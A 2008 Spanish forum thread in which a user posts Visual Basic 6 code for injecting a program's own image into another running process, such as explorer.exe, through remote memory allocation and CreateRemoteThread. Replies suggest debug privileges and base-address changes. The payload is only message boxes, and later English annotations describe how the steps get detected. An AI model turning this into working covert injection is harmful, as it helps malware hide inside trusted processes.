EXE Injection

Iniciado por XcryptOR, 7 Octubre 2008, 15:41 PM


XcryptOR

tengo una duda: ¿la inyección de code solo se puede hacer a otro ejecutable en VB, o podría inyectar mi code a explorer.exe?

¿podría alguien postear algún code que sirva?


' Win32 API declarations used by Main and HijackModule below. Together they
' form the remote-thread injection sequence (OpenProcess -> VirtualAllocEx ->
' WriteProcessMemory -> CreateRemoteThread) that endpoint monitoring commonly
' treats as a high-signal event; see the comments in Main for how each is used.
Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
' Allocate / free memory inside another process's address space.
Public Declare Function VirtualAllocEx Lib "kernel32" (ByVal ProcessHandle As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Public Declare Function VirtualFreeEx Lib "kernel32" (ByVal ProcessHandle As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
' Used in Main to resolve the target window's owning process id.
Public Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
' Starts a thread in the target process at an arbitrary address.
Public Declare Function CreateRemoteThread Lib "kernel32" (ByVal ProcessHandle As Long, lpThreadAttributes As Long, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
Public Declare Function GetModuleHandleA Lib "kernel32" (ByVal ModName As String) As Long
Public Declare Function WriteProcessMemory Lib "kernel32" (ByVal ProcessHandle As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nsize As Long, lpNumberOfBytesWritten As Long) As Long
' LoadLibrary, DeleteFile, CreateEvent and ExitThread are declared but not
' called anywhere in this listing.
Public Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
' Called from HijackModule (the VB MsgBox built-in is used in Main instead).
Public Declare Function MessageBox Lib "user32" Alias "MessageBoxA" (ByVal hwnd As Long, ByVal lpText As String, ByVal lpCaption As String, ByVal wType As Long) As Long
Public Declare Function DeleteFile Lib "kernel32" Alias "DeleteFileA" (ByVal lpFileName As String) As Long
Public Declare Function CreateEvent Lib "kernel32" Alias "CreateEventA" (ByVal lpEventAttributes As Long, ByVal bManualReset As Long, ByVal bInitialState As Long, ByVal lpname As String) As Long
' NOTE(review): hmodule and nsize are declared As Integer (16-bit) here while
' every other handle and size in this module is Long — confirm against the
' Win32 prototype; the result is not read anywhere in this listing anyway.
Public Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hmodule As Integer, ByVal lpFileName As String, ByVal nsize As Integer) As Integer
Public Declare Sub ExitThread Lib "kernel32" (ByVal dwExitCode As Long)
' RtlMoveMemory alias: Main uses it to copy PE header bytes out of this
' process's own mapped image into the Type variables below.
Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)

' Allocation / free flags passed to VirtualAllocEx and VirtualFreeEx in Main.
Const MEM_COMMIT = &H1000
Const MEM_RESERVE = &H2000
Const MEM_RELEASE = &H8000
' Page protection requested for the remote region: readable, writable AND
' executable at once (RWX). RWX allocations in a foreign process are a common
' detection heuristic on their own.
Const PAGE_EXECUTE_READWRITE = &H40&
' Number of IMAGE_DATA_DIRECTORY entries in the optional header. The name is
' misspelled, but IMAGE_OPTIONAL_HEADER32 references it exactly as written.
Const IMAGE_NUMBEROF_DIRECTIRY_ENRIES = 16
' Access-mask pieces combined into PROCESS_ALL_ACCESS, the broadest process
' right; it is what Main requests from OpenProcess.
Const STANDARD_RIGHTS_REQUIRED = &HF0000
Const SYNCHRONIZE = &H100000
Const PROCESS_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)

' One entry of the optional header's DataDirectory table (RVA + size),
' 8 bytes, mirroring winnt.h IMAGE_DATA_DIRECTORY.
Type IMAGE_DATA_DIRECTORY
    VirtualAddress As Long
    Size As Long
End Type

' COFF file header, 20 bytes, mirroring winnt.h IMAGE_FILE_HEADER. Main only
' uses Len() of this type to skip past it when locating the optional header.
' TimeDataStamp is winnt.h's TimeDateStamp — typo in the name only, the
' layout is unaffected.
Type IMAGE_FILE_HEADER
    Machine As Integer
    NumberOfSections As Integer
    TimeDataStamp As Long
    PointerToSymbolTable As Long
    NumberOfSymbols As Long
    SizeOfOptionalHeader As Integer
    Characteristics As Integer
End Type

' PE32 optional header, 224 bytes, mirroring winnt.h IMAGE_OPTIONAL_HEADER32.
' Main copies it out of this process's own image and reads SizeOfImage.
' Several member names are misspelled relative to winnt.h (SizeOfInitalizedData,
' SizeOfUninitalizedData, LoaerFlags); sizes and offsets still match.
Type IMAGE_OPTIONAL_HEADER32
    Magic As Integer
    MajorLinkerVersion As Byte
    MinorLinkerVersion As Byte
    SizeOfCode As Long
    SizeOfInitalizedData As Long
    SizeOfUninitalizedData As Long
    AddressOfEntryPoint As Long
    BaseOfCode As Long
    BaseOfData As Long
    ImageBase As Long
    SectionAlignment As Long
    FileAlignment As Long
    MajorOperatingSystemVersion As Integer
    MinorOperatingSystemVersion As Integer
    MajorImageVersion As Integer
    MinorImageVersion As Integer
    MajorSubsystemVersion As Integer
    MinorSubsystemVersion As Integer
    Reserved1 As Long
    ' Size of the whole mapped image; Main uses it as the copy length.
    SizeOfImage As Long
    SizeOfHeaders As Long
    CheckSum As Long
    Subsystem As Integer
    DllCharacteristics As Integer
    SizeOfStackReserve As Long
    SizeOfStackCommit As Long
    SizeOfHeapReserve As Long
    SizeOfHeapCommit As Long
    LoaerFlags As Long
    NumberOfRvaAndSizes As Long
    ' 16 entries x 8 bytes = 128 bytes.
    DataDirectory(IMAGE_NUMBEROF_DIRECTIRY_ENRIES - 1) As IMAGE_DATA_DIRECTORY
End Type

' Single-Long wrapper. Only referenced by the local TestType in Main, which
' is declared and never used.
Type test
    t1 As Long
End Type

' MZ/DOS header, 64 bytes, mirroring winnt.h IMAGE_DOS_HEADER. Main copies it
' from this process's own image base and reads e_lfanew (offset of the PE
' signature). e_onvo is winnt.h's e_ovno — name typo only.
Type IMAGE_DOS_HEADER
    e_magic As Integer
    e_cblp As Integer
    e_cp As Integer
    e_crlc As Integer
    e_cparhdr As Integer
    e_minalloc As Integer
    e_maxalloc As Integer
    e_ss As Integer
    e_sp As Integer
    e_csum As Integer
    e_ip As Integer
    e_cs As Integer
    e_lfarlc As Integer
    e_onvo As Integer
    e_res(3) As Integer
    e_oemid As Integer
    e_oeminfo As Integer
    e_res2(9) As Integer
    ' File offset of the "PE\0\0" signature; the file header follows it.
    e_lfanew As Long
End Type
' Window title Main looks up to find the target process (presumably a
' default VB test project — confirm). szSharedData is a fixed 261-character
' (MAX_PATH + 1) buffer that receives this executable's own path.
Const szTarget As String = "project1"
Dim szSharedData As String * 261
Public Sub Main()
' Sub that will start when the program is run
' Proof-of-concept "EXE injection": copies this process's own mapped image
' into a target process and starts a remote thread at HijackModule.
' Flow: find the target by window title -> open it with full access -> read
' this process's PE headers to learn SizeOfImage -> free/allocate an RWX
' region in the target at this process's own base address -> write the image
' there -> CreateRemoteThread.
' No API return value is checked; failures only show up as raw numbers in
' the final MsgBox.
Dim PID As Long, ProcessHandle As Long
Dim Size As Long, BytesWritten As Long, TID As Long, Module As Long, NewModule As Long
' TestType is declared but never used.
Dim PImageOptionalHeader As IMAGE_OPTIONAL_HEADER32, PImageDosHeader As IMAGE_DOS_HEADER, TImageFileHeader As IMAGE_FILE_HEADER, TestType As test

' Own executable path into the module-level buffer; not read later here.
GetModuleFileName 0, szSharedData, 261

' Target located by window title. If no window matches, FindWindow returns
' 0 and PID stays 0 — nothing checks that.
GetWindowThreadProcessId FindWindow(vbNullString, szTarget), PID

' Full-access handle to the target. A 0 handle (denied, bad PID) is not
' detected; every later call would silently operate on it.
ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, False, PID)

' Handle (= base address) of this process's own executable image.
Module = GetModuleHandleA(vbNullString)

' DOS header from our own image base, to get e_lfanew.
CopyMemory PImageDosHeader, ByVal Module, Len(PImageDosHeader)

' Optional header follows the 4-byte PE signature and the file header.
CopyMemory PImageOptionalHeader, ByVal (Module + PImageDosHeader.e_lfanew + 4 + Len(TImageFileHeader)), Len(PImageOptionalHeader)

' Length of the copy below.
Size = PImageOptionalHeader.SizeOfImage


' Intended to release whatever the target has at OUR base address and then
' re-allocate that same range as RWX. Whether VirtualAllocEx really returns
' the requested address (NewModule = Module) is never verified, even though
' the remote thread start address below assumes it.
VirtualFreeEx ProcessHandle, Module, 0, MEM_RELEASE

NewModule = VirtualAllocEx(ProcessHandle, Module, Size, MEM_RESERVE Or MEM_COMMIT, PAGE_EXECUTE_READWRITE)

' Copy the whole in-memory image into the target.
WriteProcessMemory ProcessHandle, ByVal NewModule, ByVal Module, Size, BytesWritten

' Thread in the target at HijackModule's address as seen in THIS process;
' lpParameter is our module handle. Open/Alloc(RWX)/Write/CreateRemoteThread
' is the textbook injection sequence endpoint monitoring commonly flags.
CreateRemoteThread ProcessHandle, ByVal 0, 0, ByVal GetAdd(AddressOf HijackModule), ByVal Module, 0, TID

' Diagnostic dump of every raw value obtained above.
MsgBox "Handle of the process is: " & ProcessHandle & vbCrLf & "Callback of HijackModule is: " & GetAdd(AddressOf HijackModule) & vbCrLf & "Handle of module is: " & Module & vbCrLf & "Size of module is: " & Size & vbCrLf & "Memory was allocated at: " & NewModule & vbCrLf & "Thread created with handle: " & TID
End Sub

Private Function GetAdd(Entrypoint As Long) As Long
' Identity function: returns the value it is given.
' VB6 only allows AddressOf as a procedure argument, so passing
' AddressOf SomeProc through here is the usual way to capture a
' procedure's address in a plain Long (see Main).
    Dim Address As Long
    Address = Entrypoint
    GetAdd = Address
End Function

Public Function HijackModule(Stuff As Long) As Long
' Routine Main points the remote thread at. Stuff receives the lpParameter
' given to CreateRemoteThread (our module handle) and is not used.
' The body is three sequential message boxes; the return value is never
' assigned, so callers get 0. The "delete me" wording refers to the idea
' that the copied code keeps running after the original file is removed —
' the reason memory-resident (not just on-disk) scanning matters.
MessageBox 0, "I am inside a hijacked application", "Hello!", 0
MessageBox 0, "Close the ""Inject"" message box and then delete me", "Hello!", 0
MessageBox 0, "You see? I am still running even if you deleted me.", "Hello!", 0
End Function



he estado intentando pero sin éxito, agradecería cualquier aporte que me puedan brindar.

Gracias.



Fr4NN^

La inyección de code o de una dll, por ejemplo, se hace sobre un proceso que esté corriendo.. inyecta el code en la memoria..

aver si alguno tiene un buen code en vb y explica un pokito si tiene tiempo  :P

saludos
Leyendo se aprende


aaronduran2

Hay varios ejemplos de cobein en el foro, que mostraban como hacer inyección de DLL fácilmente.

Saludos.

XcryptOR

El tema es inyección de EXE. La inyección DLL no me da problemas; lo que necesito es inyectar mi EXE dentro de otro, por ejemplo explorer. Entiendo que se inyecta la dirección a una función de mi EXE; el problema es que cuando lo ejecuto me dice que la memoria no se puede escribir.




cobein

Vas a necesitar ajustar los privilegios a SeDebugPrivilege.
http://www.advancevb.com.ar
Más Argentino que el morcipan
Aguante el Uvita tinto, Tigre, Ford y seba123neo
Karcrack es un capo.

XcryptOR

Sí estoy dándole permisos; la verdad me parece más que es un error en la llamada a la función VirtualAllocEx, que si no estoy mal ubica un espacio en memoria. He escuchado algo sobre la address base del exe, no sé si estoy en lo correcto. Quiero saber si alguien ha inyectado code en otro proceso, y si hay errores en mi code, saberlo o cómo hacerlo funcionar. Bueno, NO se trata de inyección DLL, sino de inyección de un EXE en otro EXE.

gracias



cobein

Sí, necesitas un control de compilador para modificar el base address cuando compilas; si no, no va a funcionar.

Edit: contesto tu otra pregunta, podrías inyectarlo en cualquier exe... pero eso va a depender de cómo lo programes.
http://www.advancevb.com.ar
Más Argentino que el morcipan
Aguante el Uvita tinto, Tigre, Ford y seba123neo
Karcrack es un capo.